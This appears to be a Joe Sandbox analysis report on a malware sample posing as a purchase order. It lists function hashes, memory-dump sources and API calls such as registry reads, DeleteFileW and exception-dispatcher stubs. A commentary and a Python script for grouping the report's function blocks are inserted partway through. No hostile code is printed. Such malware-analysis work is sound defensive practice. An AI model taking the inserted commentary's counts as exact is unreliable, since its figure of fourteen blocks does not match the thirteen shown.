                                                  • Instruction ID: 34b4be18ba3f1b777c3589a8af55c9f36fadf0dfc4f9bbb2cda48ef44e9befb2
                                                  • Opcode Fuzzy Hash: 4628f075d5a92ea57e4f61066b546588c7eee7a7859ccefafa82b924dd5051f0
                                                  • Instruction Fuzzy Hash: 1FC17675E006188FDB58CF6AC984AD9BBF2BF89304F14C1A9D409AB325DB315E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a112e9cebbe854b4c4aa58df3a3998cc5dcc684f1faf41fdd770c23b9596c65f
                                                  • Instruction ID: d425d22887d16bbc7894dbfb2b8721b7144d72cbb1a17dffc877cee50cfb1e0d
                                                  • Opcode Fuzzy Hash: a112e9cebbe854b4c4aa58df3a3998cc5dcc684f1faf41fdd770c23b9596c65f
                                                  • Instruction Fuzzy Hash: C7617E74E04216CFDB58DFAAE540A9EBBF3BB88208F04C539C015AB768EF7059459B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e6bfca5945a23237e0c103926e65dd59e3b9439fc5b8b0376cb05e1bb9c0c54
                                                  • Instruction ID: f52ccf2a08701540bb6f1834540586b9bed10e275148f2df22ac48464a3910f8
                                                  • Opcode Fuzzy Hash: 9e6bfca5945a23237e0c103926e65dd59e3b9439fc5b8b0376cb05e1bb9c0c54
                                                  • Instruction Fuzzy Hash: 9B616074E04216CFDB58DFAAE54079EBBF3BB88208F04C539C015AB768EF7059459B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28bc2d4abbef4d178dda2c2a96c3f1a25c3db3333516a77baab9d1e46b31c2a1
                                                  • Instruction ID: 32a6289f25ed27e29009c0849a82901f29d528891c6ed0f84675fa479dd753e9
                                                  • Opcode Fuzzy Hash: 28bc2d4abbef4d178dda2c2a96c3f1a25c3db3333516a77baab9d1e46b31c2a1
                                                  • Instruction Fuzzy Hash: 0F4123B1E15A589BEB1CCF6BCC4168AFAF7AFC9301F14C1BA981CAB255EB3045458F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e1aee160b324d557f38b200e47acd086d0666b537584e684c5bb9c12cb0095f
                                                  • Instruction ID: 5b53b7c58325ae2657e6cff9829e829109bed6d0c272d5ee7a1dcc22237c8f44
                                                  • Opcode Fuzzy Hash: 6e1aee160b324d557f38b200e47acd086d0666b537584e684c5bb9c12cb0095f
                                                  • Instruction Fuzzy Hash: 46414A71D14A589BEB1CCF6BDC4178BFAF7AFC9201F14C1BA985CAA255EB3005458F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:19.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:366
                                                  Total number of Limit Nodes:6
                                                  (rendered execution graph not recoverable from the text dump; node list omitted. What the dump resolves, by entry point:)
                                                  • fc0850 -> 5bf6048/5bf6058 -> 5bf6057 -> 5bf65da/5bf6619/5bf6438 -> 5bf6758/5bf6748 -> 5bf5d0c -> 5bf6928 DeleteFileW
                                                  • 5bf61b2 -> 5bf6ad8/5bf6ac8 (rolled up as "66 API calls") -> 5bf6be8/5bf6bd8 -> roughly forty stubs in 5bf7942-5bf83dd, each ending in KiUserExceptionDispatcher at 5bf7f30/5bf7f4f or 5bf8404; the stubs 5bf7942, 5bf7963, 5bf79a8, 5bf79ed, 5bf7a32 and 5bf7a77 first call 64b7a53/64b7ab0, which read the registry via RegOpenKeyExW (64b6814/64b7dc8) and RegQueryValueExW (64b6820)
                                                  • fcadd0 -> fc9dc0 -> fcc8f0 LoadLibraryA
                                                  • fc4540 -> fc478a -> fc496c/fc4870/fc4986/fc485f -> fc4c78/fc4c67 -> fc4cc8/fc4cbb -> fc4d02 -> fc4d2c RtlEncodePointer

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7963. A linear chain of basic blocks; each call site was resolved to several targets:
                                                  5bf7963-5bf7987: call 5bf5a68, call 5bf5bf8; site 5bf7987 -> 64b57d0 | 64b5830
                                                  5bf798d-5bf79cc: site 5bf79cc -> 64b6451 | 64b63f0 | 64b6020
                                                  5bf79d2-5bf7a11: site 5bf7a11 -> 64b7708 | 64b7258 | 64b7268 | 64b6b53 | 64b6b60 | 64b7316
                                                  5bf7a17-5bf7a56: site 5bf7a56 -> 64b79ef | 64b7a53 | 64b7933 | 64b7990
                                                  5bf7a5c-5bf7a9b: site 5bf7a9b -> 64b7a53 | 64b7ab0
                                                  5bf7aa1-5bf7ae0: site 5bf7ae0 -> 64b8212 | 64b84c0 | 64b8520 | 64b8210
                                                  5bf7ae6-5bf7b25: site 5bf7b25 -> 64b9a98 | 64b9a96
                                                  5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2
                                                  5bf860c-5bf864f: exit
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7fe37894a4f38855bf4f1fa045b30da9509066a1f1565a49b3bb409466dfc12e
                                                  • Instruction ID: b9d0753e495fa5ce904663420b6888fdbd0680cf7dd9f3a03b45d54390d65837
                                                  • Opcode Fuzzy Hash: 7fe37894a4f38855bf4f1fa045b30da9509066a1f1565a49b3bb409466dfc12e
                                                  • Instruction Fuzzy Hash: 9402F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7942: block 5bf7942-5bf7987, site 5bf7987 -> 64b57d0 | 64b5830; then 5bf798d-5bf79cc, 5bf79d2-5bf7a11, 5bf7a17-5bf7a56, 5bf7a5c-5bf7a9b, 5bf7aa1-5bf7ae0 and 5bf7ae6-5bf7b25 with the same call-site targets as the 5bf7963 graph; 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 6222b5ed1852924ea1f8e45281d4db7f6c9a4ead3309d0d90c4dfcc7a8b6b867
                                                  • Instruction ID: e9f41e7b1bf13323b8ca8e9263bc269bcb2292d41e744dcb4f83350de54e807b
                                                  • Opcode Fuzzy Hash: 6222b5ed1852924ea1f8e45281d4db7f6c9a4ead3309d0d90c4dfcc7a8b6b867
                                                  • Instruction Fuzzy Hash: 2C02033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf79a8: block 5bf79a8-5bf79cc calls 5bf5a68 and 5bf5bf8, site 5bf79cc -> 64b6451 | 64b63f0 | 64b6020; then 5bf79d2-5bf7a11, 5bf7a17-5bf7a56, 5bf7a5c-5bf7a9b, 5bf7aa1-5bf7ae0 and 5bf7ae6-5bf7b25 with the same call-site targets as the 5bf7963 graph; 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 0b14a850d4085215de38734efbe90170d62737c850f0a0e1aa5a51ca0d2101e5
                                                  • Instruction ID: 346d4b1e432a1ba904e7eb9d1939df70ed5e5d5bbadb3b048c0a2a7106264d57
                                                  • Opcode Fuzzy Hash: 0b14a850d4085215de38734efbe90170d62737c850f0a0e1aa5a51ca0d2101e5
                                                  • Instruction Fuzzy Hash: 3502133890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf79ed: block 5bf79ed-5bf7a11 calls 5bf5a68 and 5bf5bf8, site 5bf7a11 -> 64b7708 | 64b7258 | 64b7268 | 64b6b53 | 64b6b60 | 64b7316; then 5bf7a17-5bf7a56, 5bf7a5c-5bf7a9b, 5bf7aa1-5bf7ae0 and 5bf7ae6-5bf7b25 with the same call-site targets as the 5bf7963 graph; 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3030f632361f7b956039142f0eec4c0bcae33f586a4ca208d58591735ed3b7da
                                                  • Instruction ID: cb6152d4055a1f40183a3970b5e00b2d25f618e881f1b5f7986c22ee1bb4a1e6
                                                  • Opcode Fuzzy Hash: 3030f632361f7b956039142f0eec4c0bcae33f586a4ca208d58591735ed3b7da
                                                  • Instruction Fuzzy Hash: 1202F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7a32: block 5bf7a32-5bf7a56 calls 5bf5a68 and 5bf5bf8, site 5bf7a56 -> 64b79ef | 64b7a53 | 64b7933 | 64b7990; then 5bf7a5c-5bf7a9b, 5bf7aa1-5bf7ae0 and 5bf7ae6-5bf7b25 with the same call-site targets as the 5bf7963 graph; 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 42f97eaa76aa2c3dfbe9ec71f28bc74feead87459934e4f2ff0f868ecd55b8bc
                                                  • Instruction ID: ceb15241c5214d96a04c3cf603510e23f65cd831a26a9841112b805159ca767c
                                                  • Opcode Fuzzy Hash: 42f97eaa76aa2c3dfbe9ec71f28bc74feead87459934e4f2ff0f868ecd55b8bc
                                                  • Instruction Fuzzy Hash: 1802E43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7a77: block 5bf7a77-5bf7a9b calls 5bf5a68 and 5bf5bf8, site 5bf7a9b -> 64b7a53 | 64b7ab0; then 5bf7aa1-5bf7ae0 (site 5bf7ae0 -> 64b8212 | 64b84c0 | 64b8520 | 64b8210) and 5bf7ae6-5bf7b25 (site 5bf7b25 -> 64b9a98 | 64b9a96); 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4f465dd6f6e57494f2002796c52328fdc60d87268c2bd8960d17bffb7a8ec587
                                                  • Instruction ID: 1245b8ce8461e1aa4c5551902c9ab0ad714c6139f55c0283305553a4ce6168ed
                                                  • Opcode Fuzzy Hash: 4f465dd6f6e57494f2002796c52328fdc60d87268c2bd8960d17bffb7a8ec587
                                                  • Instruction Fuzzy Hash: BCF1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7abc: block 5bf7abc-5bf7ae0 calls 5bf5a68 and 5bf5bf8, site 5bf7ae0 -> 64b8212 | 64b84c0 | 64b8520 | 64b8210; then 5bf7ae6-5bf7b25 (site 5bf7b25 -> 64b9a98 | 64b9a96); 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ebefaa866da31cbd3792c40b0bb209c4e905dc1bd5a4c34e5902276addc0aba0
                                                  • Instruction ID: 85b4761cd10ff6167ebe95dd386882625eceb97f634ca761230aeacce70e3925
                                                  • Opcode Fuzzy Hash: ebefaa866da31cbd3792c40b0bb209c4e905dc1bd5a4c34e5902276addc0aba0
                                                  • Instruction Fuzzy Hash: CDF1F23890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Graph data (image not preserved), entry 5bf7b01: block 5bf7b01-5bf7b25 calls 5bf5a68 and 5bf5bf8, site 5bf7b25 -> 64b9a98 | 64b9a96; 5bf7b2b-5bf8606: KiUserExceptionDispatcher x 2; 5bf860c-5bf864f: exit.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ae0a29769ad9f868b79d37df964db310055e2edebce99ec9bd599e4ab7c20c5a
                                                  • Instruction ID: 7ea640ec335060b5b25b4f1a614110d143ad9a4c727af7914507f335e5bf416f
                                                  • Opcode Fuzzy Hash: ae0a29769ad9f868b79d37df964db310055e2edebce99ec9bd599e4ab7c20c5a
                                                  • Instruction Fuzzy Hash: 8DF1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
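The function blocks above are worth reading together rather than one at a time. The eight graphs with entries 5bf7942, 5bf7963, 5bf79a8, 5bf79ed, 5bf7a32, 5bf7a77, 5bf7abc and 5bf7b01 (the last seven spaced exactly 0x45 bytes apart, each beginning with calls to 5bf5a68 and 5bf5bf8) all converge on the block 5bf7b2b-5bf8606 that holds the two KiUserExceptionDispatcher references, share API String ID 6842923-0, and carry instruction fuzzy hashes that differ almost only in their leading eight hex digits. That pattern says "several entry points into one body" rather than "a dozen distinct functions", and it is the kind of thing an analyst should collapse before counting unique code. The script below is an added example, not Joe Sandbox's own code or anything shipped with the report: it parses blocks laid out as they are printed on this page, groups them by the API references they cite, flags entries whose graph dumps end in the same basic block, and compares fuzzy hashes by a plain position-wise nibble distance. That distance metric is an assumption of the example, not Joe Sandbox's similarity measure. The sample text embeds three blocks copied from this page plus one constructed RtlEncodePointer block with placeholder values so that the grouping has something to separate.

```python
"""Group the per-function metadata blocks of a Joe Sandbox disassembly section
by API profile, CFG exit block and instruction fuzzy hash.

Added example, not Joe Sandbox's code.  Fuzzy hashes are treated as opaque hex
strings; the nibble-distance metric is this example's assumption.
"""
import re
from collections import defaultdict
from itertools import combinations

# Constructed sample in the page's own layout: three blocks copied from the page
# (graph dumps cut down to entry, converging and exit basic blocks) plus one
# constructed block whose API String ID, Opcode ID and fuzzy hash are placeholders.
SAMPLE_REPORT = """
Control-flow Graph
control_flow_graph 167 5bf7963-5bf7987 call 5bf5a68 call 5bf5bf8 191 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 310 5bf860c-5bf864f 191->310
APIs
• KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
• KiUserExceptionDispatcher.NTDLL ref: 05BF8404
• API String ID: 6842923-0
• Opcode ID: 7fe37894a4f38855bf4f1fa045b30da9509066a1f1565a49b3bb409466dfc12e
• Instruction Fuzzy Hash: 9402F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 0 5bf7942-5bf7987 22 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 141 5bf860c-5bf864f 22->141
APIs
• KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
• KiUserExceptionDispatcher.NTDLL ref: 05BF8404
• API String ID: 6842923-0
• Opcode ID: 6222b5ed1852924ea1f8e45281d4db7f6c9a4ead3309d0d90c4dfcc7a8b6b867
• Instruction Fuzzy Hash: 2C02033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 807 5bf7a77-5bf7a9b call 5bf5a68 call 5bf5bf8 819 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 938 5bf860c-5bf864f 819->938
APIs
• KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
• KiUserExceptionDispatcher.NTDLL ref: 05BF8404
• API String ID: 6842923-0
• Opcode ID: 4f465dd6f6e57494f2002796c52328fdc60d87268c2bd8960d17bffb7a8ec587
• Instruction Fuzzy Hash: BCF1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 0 fc4c78-fc4c86 1 fc4d02-fc4d55 RtlEncodePointer 0->1
APIs
• RtlEncodePointer.NTDLL ref: 00FC4D2C
• API String ID: 0000000-0
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
• Instruction Fuzzy Hash: 00000000000000000000000000000000000000000000000000000000000000000000000000
Uniqueness Score: -1.00%
"""

BLOCK_HEADER = re.compile(r"^\s*Control-flow Graph\s*$", re.M)
API_REF = re.compile(r"•\s*(\w+)\.(\w+)\s+ref:\s*([0-9A-Fa-f]+)")
# Basic blocks appear in the graph dump as lowercase "start-end" address pairs.
BASIC_BLOCK = re.compile(r"\b([0-9a-f]{5,8})-([0-9a-f]{5,8})\b")


def field(chunk, name):
    """Value of a '• <name>: <value>' metadata line, or None."""
    m = re.search(r"•\s*" + re.escape(name) + r":\s*(\S+)", chunk)
    return m.group(1) if m else None


def parse_blocks(text):
    """One record per function block that carries an instruction fuzzy hash."""
    records = []
    for chunk in BLOCK_HEADER.split(text):
        fuzzy = field(chunk, "Instruction Fuzzy Hash")
        if fuzzy is None:
            continue                      # preamble or a block without metadata
        ranges = BASIC_BLOCK.findall(chunk)   # basic blocks in dump order
        records.append({
            "entry": ranges[0][0] if ranges else None,
            "exit": ranges[-1][0] if ranges else None,   # last block listed (heuristic)
            "apis": tuple(sorted(f"{api}.{mod}@{addr.upper()}"
                                 for api, mod, addr in set(API_REF.findall(chunk)))),
            "api_string_id": field(chunk, "API String ID"),
            "opcode_id": field(chunk, "Opcode ID"),
            "fuzzy": fuzzy,
        })
    return records


def nibble_distance(a, b):
    """Count of differing hex digits by position (this example's assumption)."""
    if len(a) != len(b):
        return max(len(a), len(b))
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def group_by_api_profile(records):
    """Bucket records by the exact set of API references they cite."""
    groups = defaultdict(list)
    for r in records:
        groups[r["apis"]].append(r)
    return dict(groups)


def converging_entries(records):
    """Entry points whose graphs end in the same basic block: candidates for
    overlapping entries into one body rather than distinct functions."""
    by_exit = defaultdict(list)
    for r in records:
        by_exit[r["exit"]].append(r["entry"])
    return {exit_: sorted(v) for exit_, v in by_exit.items() if len(v) > 1}


def summarize(text):
    """Per API profile: member entries and the largest pairwise hash distance."""
    out = []
    for apis, members in group_by_api_profile(parse_blocks(text)).items():
        dists = [nibble_distance(a["fuzzy"], b["fuzzy"])
                 for a, b in combinations(members, 2)]
        out.append({"apis": apis,
                    "entries": sorted(m["entry"] for m in members),
                    "max_hash_distance": max(dists, default=0)})
    return out


if __name__ == "__main__":
    for g in summarize(SAMPLE_REPORT):
        print(len(g["entries"]), "entries", g["entries"],
              "max nibble distance", g["max_hash_distance"], g["apis"])
    print("converging:", converging_entries(parse_blocks(SAMPLE_REPORT)))
```

On the sample, the three KiUserExceptionDispatcher blocks land in one group with a maximum distance of 5 out of 70 nibbles and a shared exit block 5bf860c, while the constructed RtlEncodePointer block stays on its own. Running the same parser over the full page would pull all of the 05BF0000 blocks into that single group, which is the correct unit to report rather than fourteen separate functions.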

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7c1aa6aa3dbc546e35260b08c9ed53d157ad9f5039e168712ab3bc70de7ae1a2
                                                  • Instruction ID: b70976f24619038c8402781e691ecd9d1335db1af58fa05a21ab7bc99674367f
                                                  • Opcode Fuzzy Hash: 7c1aa6aa3dbc546e35260b08c9ed53d157ad9f5039e168712ab3bc70de7ae1a2
                                                  • Instruction Fuzzy Hash: 95F1E43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 31d9df14dde6a42c804199b092f0f6a9102fb1802028953864e17c20271be05e
                                                  • Instruction ID: e91c0281e34309a08fefa1171423889f006385b026638cbd4068ac803b179032
                                                  • Opcode Fuzzy Hash: 31d9df14dde6a42c804199b092f0f6a9102fb1802028953864e17c20271be05e
                                                  • Instruction Fuzzy Hash: 73E1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8ce95b1b3b40ad315fa8cfcc0699cbc2214920ec6b66593a7966539cd6155dfa
                                                  • Instruction ID: 9c2e0f8c51f7d246bd5f30fef2ac8d101819a58484b69ba63236cacfd2031ee1
                                                  • Opcode Fuzzy Hash: 8ce95b1b3b40ad315fa8cfcc0699cbc2214920ec6b66593a7966539cd6155dfa
                                                  • Instruction Fuzzy Hash: 24E1043890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 195b11218d8210781763a011ae1655a8c8c7d28a29c30a9c15ad57cdd09210f2
                                                  • Instruction ID: 6151807c63216577314c68d4a8ac6dee3b0ab810c7207401f2989ab995299ef9
                                                  • Opcode Fuzzy Hash: 195b11218d8210781763a011ae1655a8c8c7d28a29c30a9c15ad57cdd09210f2
                                                  • Instruction Fuzzy Hash: 8DE1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
